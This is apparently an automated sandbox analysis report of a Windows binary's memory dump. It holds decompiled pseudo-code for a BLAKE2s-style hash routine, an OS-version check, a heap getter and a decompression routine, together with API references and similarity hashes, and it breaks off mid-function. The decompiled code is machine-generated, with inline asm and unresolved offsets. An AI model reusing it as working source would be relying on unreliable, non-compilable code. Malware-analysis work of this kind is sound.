0x001c0899
0x001c08a0
0x001c08a2
0x001c08a2
0x001c08a9
0x001c08ab
0x001c08ab
0x001c08b2
0x001c08b4
0x001c08b4
0x001c08c1
0x001c08c4
0x001c08fb
0x001c08c6
0x001c08c6
0x001c08c9
0x001c08f4
0x001c08e9
0x001c08e9
0x001c08fd
0x001c0905
0x001c0908
0x001c0927
0x001c092c
0x001c092c
0x001c092e
0x001c0933
0x001c093f
0x001c0935
0x001c0938
0x001c0938
0x001c0944
0x001c0944
0x001c090a
0x001c090d
0x001c091c
0x00000000
0x001c091c
0x001c090f
0x001c0912
0x001c0914
0x001c0914
0x00000000
0x001c0912
0x001c08cb
0x001c08ce
0x001c08e4
0x00000000
0x001c08e4
0x001c08d3
0x001c08d5
0x001c08d5
0x001c08d3
0x00000000
0x001c08c4
0x001c07c6
0x001c07d4
0x001c07dc
0x00000000
0x001c07dc
0x001c07ca
0x001c07cf
0x001c07cf
0x00000000
0x001c07ca
0x001c0787
0x001c0795
0x001c079d
0x00000000
0x001c079d
0x001c078b
0x001c0790
0x001c0790
0x001c078b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001C064F,?,?,00000008,?,?,001C02EF,00000000), ref: 001C0881

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3532701fcd9098486519fcbb46d1549aef6b485814d7f4bcdf40dc4260ff315c
Instruction ID: e23c8fcc5a97d769298bd559d8880b0c8fad2de963f1d27b33aeb3fa36b0d84b
Opcode Fuzzy Hash: 3532701fcd9098486519fcbb46d1549aef6b485814d7f4bcdf40dc4260ff315c
Instruction Fuzzy Hash: CBB12935610608DFD71ACF28C48AB657BA0FF59364F29865CE9D9CF2A2C335E991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00193EAD, Relevance: 1.6, Strings: 1, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00193EAD() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0x1c23b0; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0x1c23b1; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x1c23b2; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0x1c23b3; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x1c23b4; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0x1c23b5; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0x1c23b6; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0x1c23b7; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0x1c23b8; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0x1c23b9; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0x1c23ba; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0x1c23bb; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0x1c23bc; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0x1c23bd; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0x1c23be; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0x1c23bf; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

0x00193eb3
0x00193ecd
0x00193ed5
0x00193edd
0x00193edd
0x00193ee9
0x00193eec
0x00193eec
0x00193ef8
0x00193efe
0x00193f04
0x00193f0a
0x00193f0e
0x00193f17
0x00193f20
0x00193f26
0x00193f2f
0x00193f39
0x00193f41
0x00193f49
0x00193f51
0x00193f59
0x00193f61
0x00193f65
0x00193f69
0x00193f6d
0x00193f71
0x00193f75
0x00193f7d
0x00193f81
0x00193f85
0x00193f85
0x00193f99
0x00193f9f
0x00193fa3
0x00193fa9
0x00193fac
0x00193fae
0x00193fb0
0x00193fb4
0x00193fb8
0x00193fbb
0x00193fbf
0x00193fd3
0x00193fd9
0x00193fdd
0x00193fe3
0x00193fe6
0x00193fea
0x00193fee
0x00193ff1
0x00193ffd
0x0019400f
0x00194015
0x00194019
0x0019401f
0x00194022
0x00194024
0x00194026
0x0019402a
0x0019402e
0x00194031
0x00194035
0x00194049
0x0019404f
0x00194053
0x00194059
0x0019405c
0x00194060
0x00194064
0x00194067
0x0019406f
0x00194083
0x0019408b
0x00194091
0x00194094
0x00194096
0x00194098
0x0019409c
0x001940a0
0x001940a3
0x001940b3
0x001940b9
0x001940bd
0x001940c3
0x001940c6
0x001940ca
0x001940ce
0x001940d1
0x001940d5
0x001940d9
0x001940eb
0x001940f1
0x001940f5
0x001940fb
0x001940fe
0x00194100
0x00194102
0x00194106
0x00194111
0x0019411d
0x00194123
0x00194127
0x0019412d
0x00194130
0x00194134
0x00194138
0x0019413b
0x0019413f
0x00194143
0x00194155
0x0019415b
0x0019415f
0x00194165
0x00194168
0x0019416a
0x0019416c
0x00194170
0x0019417b
0x00194187
0x0019418d
0x00194191
0x00194195
0x0019419b
0x0019419e
0x001941a0
0x001941a2
0x001941a6
0x001941aa
0x001941ae
0x001941b1
0x001941b5
0x001941b9
0x001941c0
0x001941cd
0x001941cf
0x001941d3
0x001941dd
0x001941e0
0x001941e2
0x001941e4
0x001941e8
0x001941ec
0x001941ef
0x001941ff
0x00194205
0x00194209
0x0019420d
0x00194213
0x00194216
0x00194218
0x0019421a
0x0019421e
0x00194222
0x00194226
0x00194229
0x0019422d
0x00194231
0x00194238
0x00194245
0x0019424b
0x0019424f
0x00194255
0x00194258
0x0019425a
0x0019425c
0x00194260
0x00194264
0x00194267
0x00194277
0x0019427d
0x00194281
0x00194285
0x0019428b
0x0019428e
0x00194290
0x00194292
0x00194296
0x00194299
0x0019429d
0x001942a1
0x001942a5
0x001942a9
0x001942bb
0x001942c1
0x001942c5
0x001942cb
0x001942ce
0x001942d0
0x001942d2
0x001942d6
0x001942e1
0x001942ed
0x001942ef
0x001942f3
0x001942f7
0x001942f9
0x00194300
0x00194302
0x00194304
0x00194308
0x00194310
0x00194313
0x00194316
0x0019431a
0x0019431e
0x00194322
0x00194326
0x0019432a
0x00194335
0x0019433c
0x00194343
0x0019434a
0x0019434e
0x00194352
0x00194359
0x00194359
0x00194366
0x0019436a
0x0019436d
0x00194370
0x0019437f

Strings

gj, xrefs: 00193EF0

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 758ab3fae1d7cc771be7332ac461b154ef0cf6c062960e095a2a339769122a70
Instruction ID: cc799eba3e61a21ab2204155f6a754e6b31d9136d28c277796414c0869e6b809
Opcode Fuzzy Hash: 758ab3fae1d7cc771be7332ac461b154ef0cf6c062960e095a2a339769122a70
Instruction Fuzzy Hash: A0F1D3B1A083818FC748CF29D880A1AFBE1BFCC208F19992EF498D7711D734E9458B56

Uniqueness

Uniqueness Score: -1.00%

Function 0019A995, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0019A995() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0x1cd020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0x1d00f0; // 0xa
					_t13 =  *0x1d00f4; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0x1cd020 = _t12;
					 *0x1d00f0 = _t6;
					 *0x1d00f4 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x0019a998
0x0019a9a7
0x0019a9e5
0x0019a9ea
0x0019a9a9
0x0019a9af
0x0019a9ba
0x0019a9c0
0x0019a9c6
0x0019a9cc
0x0019a9d2
0x0019a9d8
0x0019a9dd
0x0019a9dd
0x0019a9f3
0x00000000
0x0019a9f5
0x00000000
0x0019a9f8

APIs

GetVersionExW.KERNEL32(?), ref: 0019A9BA

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 15b4ca64351e5186e4f05bc8c6cc88aa9c30f6fad454f1260bbebffadc3098a1
Instruction ID: 477c8883b5cde507690988c711d2539914dada0a422e260ddf948c2d8b21c125
Opcode Fuzzy Hash: 15b4ca64351e5186e4f05bc8c6cc88aa9c30f6fad454f1260bbebffadc3098a1
Instruction Fuzzy Hash: B1F030B19422188BCB28CB18ED41BE97BB5FB59314F60429AEE1543750E370ADC4DE91

Uniqueness

Uniqueness Score: -1.00%

Function 001BACA1, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001BACA1() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x1f0874 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x001baca1
0x001baca9
0x001bacb1

APIs

GetProcessHeap.KERNEL32 ref: 001BACA1

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: e38e03f097da3cb129642d8f13beab791820098443b9b6d525bd3db1c5e59668
Instruction ID: 3e9b26cf1f71e371b3267d4473e60a4c8ef52c146af98ecf6c6bd4e033ed97d8
Opcode Fuzzy Hash: e38e03f097da3cb129642d8f13beab791820098443b9b6d525bd3db1c5e59668
Instruction Fuzzy Hash: DEA01130A022008F83008F30AA082083AE8AB08AC03088028A208C2820EB30C0A08A00

Uniqueness

Uniqueness Score: -1.00%

Function 001A589E, Relevance: .8, Instructions: 800
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001A589E(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E001A47DA(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E001A33D3(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E001A397F(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E001A4422(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E0019A4ED(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
